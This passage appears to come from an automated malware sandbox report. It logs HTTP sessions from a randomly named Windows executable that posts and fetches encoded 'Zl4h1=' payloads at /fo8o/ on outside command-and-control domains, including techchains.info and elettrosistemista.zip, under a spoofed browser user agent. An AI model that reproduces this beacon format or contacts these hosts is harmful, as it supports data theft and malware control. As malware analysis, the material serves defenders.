                                                    Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_UTC1KbQvDnBXOxP977o4eDiYjJxVkTrMz1KgVM4nmGCKy3HNEyC2jJQqk8cOymyieXG1d6ypKElJvltgnULZpQ==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informati
                                                    Jun 9, 2024 18:01:11.175154924 CEST212INData Raw: 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66
                                                    Data Ascii: on youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchi576ng for!"><link rel="icon" type="
                                                    Jun 9, 2024 18:01:11.175173044 CEST1236INData Raw: 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73
                                                    Data Ascii: image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> .container-header__link{float:right;margin-right:100px;margin-bottom:15px;font-size:16px;color:#9a9494}.container-content{clear:both}/*! normalize.
                                                    Jun 9, 2024 18:01:11.175190926 CEST12INData Raw: 69 64 64 65 6e 7d 62 75 74 74 6f 6e
                                                    Data Ascii: idden}button
                                                    Jun 9, 2024 18:01:11.175196886 CEST1236INData Raw: 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a
                                                    Data Ascii: ,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button576,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:butt
                                                    Jun 9, 2024 18:01:11.175211906 CEST212INData Raw: 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 36 32 36 32 36 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70
                                                    Data Ascii: ay:none}[hidden]{display:none}.announcement{background:#262626;text-align:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.container-header{margin:0 auto 0 auto;text-align:center}
                                                    Jun 9, 2024 18:01:11.175220013 CEST1236INData Raw: 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 5f 5f 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 0d 0a 32 35 0d 0a 7b 6d 61 72 67 69 6e 3a 32 35 70 78 20 61 75 74 6f
                                                    Data Ascii: .container-header__content{color:#717171}.container-content25{margin:25px auto 20px auto;text-alig570n:center;background:url("//img.sedoparking.com/templates/bg/arrows-1-colors-3.png") #fbfbfb no-repeat center top;background-size:100%}
                                                    Jun 9, 2024 18:01:11.175234079 CEST1236INData Raw: 67 68 74 3a 62 6f 6c 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 30 61 34 38 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d
                                                    Data Ascii: ght:bold;text-decoration:underline;color:#0a48ff}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#000}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#0a48ff}.
                                                    Jun 9, 2024 18:01:11.175242901 CEST379INData Raw: 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23
                                                    Data Ascii: tainer-buybox__content-text{font-size:12px}.container-buybox__content-link{color:#919da6}.container-buybox__content-link--no-decoration{text-decoration:none}.container-searchbox{margin-bottom:50px;text-align:center}.container-searchbox__conten
                                                    Jun 9, 2024 18:01:11.175319910 CEST1236INData Raw: 62 6f 78 5f 5f 69 6e 70 75 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 7d 2e 0d 0a 35 37 36 0d 0a 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f
                                                    Data Ascii: box__input,.container-searchbox__button{border:0 none}.576container-searchbox__button{cursor:pointer;font-size:12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer_
                                                    Jun 9, 2024 18:01:11.180572033 CEST1236INData Raw: 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 30 20 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65
                                                    Data Ascii: essage__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content576-interactive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.114973366.29.149.46806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:24.725614071 CEST779OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.techchains.info
                                                    Origin: http://www.techchains.info
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.techchains.info/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 4a 73 71 2f 63 79 42 39 4b 44 49 4c 65 52 30 63 35 48 4d 6a 79 47 31 43 37 57 5a 68 6a 50 75 73 66 51 3d 3d
                                                    Data Ascii: Zl4h1=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXJsq/cyB9KDILeR0c5HMjyG1C7WZhjPusfQ==
                                                    Jun 9, 2024 18:01:25.377434969 CEST637INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:25 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.114973466.29.149.46806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:27.478238106 CEST799OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.techchains.info
                                                    Origin: http://www.techchains.info
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.techchains.info/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 39 41 76 77 34 52 71 2b 4c 6c 45 56 6d 4c 76 34 46 42 53 6f 6d 4c 65 59 72 64 6e 4b 6a 59 2f 51 51 3d
                                                    Data Ascii: Zl4h1=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xV9Avw4Rq+LlEVmLv4FBSomLeYrdnKjY/QQ=
                                                    Jun 9, 2024 18:01:28.142008066 CEST637INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:28 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.114973566.29.149.46806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:30.020436049 CEST1812OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.techchains.info
                                                    Origin: http://www.techchains.info
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.techchains.info/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 6c 4d 79 77 42 4d 77 32 39 50 42 42 6b 57 43 67 36 35 42 57 38 71 68 53 34 62 52 2b 34 76 2f 71 6c 59 78 49 79 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 57 57 37 4e 75 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 [TRUNCATED]
                                                    Data Ascii: Zl4h1=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx3h1ylMywBMw29PBBkWCg65BW8qhS4bR+4v/qlYxIy0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp3OcE43JWW7NuLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvphzvRh4YgEGGjeh5yUsv1M8Swhi2DjBkp5+8N11pcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyN6NQg0D3zhu0uTn2L36rqvfHgwJd9//Tb/N88McRvyiwEr1yezxIxoqUTcrzuODPRImGdo/9kkAc1DTw2V4hef8j9sq6pFbKqYEEzteLxE5bv26a4FhdJ2sde8AD3wM9OOmqmP2UoElyz+AtLUDI30lOFLvR6OdE/vKyNfB2f5iYaORF6iXVqgihsMOuRveXNnr3PLe3OF82PwODAsZEk9WL/Is2E4pDKPYkqBbJ1GFY0u0sdy2xleEX8hzGvYCZ87iI4JtiEq3glhpewWSmVpoo9MOgjdfe3XTFL9UprM/MFdG+hWqy4ENYRWYrAd8xmpTJSIhSgdJ36TrBrwLCv6dq/n7JXDju0+G5F5M4OBaao6BBN6X1aPbfiAJfNrPXYNpqtB5i7PHCPdS9odhOlHYvbTs4Cig/ZO6ilvjlRdQJ7fysN4YFtFVB6oRTMeRNi774E/Ljslpf2PV7QLwY0uEVKtcZXicROPQHqfVLgzBeTjqkISEt/czv/uq3xvBG0GN1kK4AR+TWbxSC [TRUNCATED]
                                                    Jun 9, 2024 18:01:30.703097105 CEST637INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:30 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.114973666.29.149.46806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:32.551182032 CEST507OUTGET /fo8o/?Zl4h1=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa481lrDHTJpcFWPIOqV4sO7fmSS56YSbpU=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.techchains.info
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:01:33.234950066 CEST652INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:33 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.1149737195.110.124.133806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:38.365076065 CEST797OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.elettrosistemista.zip
                                                    Origin: http://www.elettrosistemista.zip
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 6a 6a 31 59 33 6f 63 6d 41 4e 4b 41 2f 57 70 73 57 64 5a 74 54 69 7a 55 70 74 74 47 63 72 37 79 6e 77 3d 3d
                                                    Data Ascii: Zl4h1=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCjj1Y3ocmANKA/WpsWdZtTizUpttGcr7ynw==
                                                    Jun 9, 2024 18:01:39.218137980 CEST367INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:39 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
